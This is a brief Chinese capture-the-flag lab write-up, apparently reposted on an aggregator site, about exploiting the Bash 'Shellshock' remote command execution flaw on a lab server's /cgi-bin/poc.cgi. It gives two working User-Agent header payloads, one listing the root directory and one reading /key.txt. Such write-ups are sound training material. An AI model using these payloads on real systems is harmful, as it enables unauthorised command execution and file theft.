[ 墨者学院 ] 命令执行——Bash漏洞分析溯源
0x00.題目描述:
背景介紹
安全工程師"墨者"對(duì)一單位業(yè)務(wù)系統(tǒng)進(jìn)行授權(quán)測(cè)試,在測(cè)試過程中,發(fā)現(xiàn)存在bash命令執(zhí)行漏洞。
實(shí)訓(xùn)目標(biāo)
1、了解bash;
2、了解Bash遠(yuǎn)程命令執(zhí)行漏洞形成原因;
3、了解Bash遠(yuǎn)程命令執(zhí)行漏洞利用方法;
解題方向
找到poc.cgi文件
?
0x01.題目分析:
根據(jù)題目說明,在網(wǎng)上對(duì)Bash遠(yuǎn)程命令執(zhí)行漏洞進(jìn)行了一番學(xué)習(xí)。
參考連接
freebuf:https://www.freebuf.com/vuls/44994.html
Seebug:https://www.seebug.org/vuldb/ssvid-88877
?
0x02.解題過程
通過網(wǎng)上的資料搜查,發(fā)現(xiàn)此漏洞存在的路徑多數(shù)在網(wǎng)頁/cgi-bin/下,結(jié)合題目給的提示,打開http://url/cgi-bin/poc.cgi
構(gòu)造執(zhí)行語句插入到請(qǐng)求頭的User-Agent頭里面
User-Agent: () { :;}; echo; /bin/ls /然后構(gòu)造執(zhí)行語句查看key.txt
User-Agent: () { :;}; echo; /bin/cat /key.txt轉(zhuǎn)載于:https://www.cnblogs.com/qtisec/p/11095444.html
總結(jié)
以上是生活随笔為你收集整理的[ 墨者学院 ] 命令执行——Bash漏洞分析溯源的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python update()
- 下一篇: 在元素前面添加一个伪元素下边框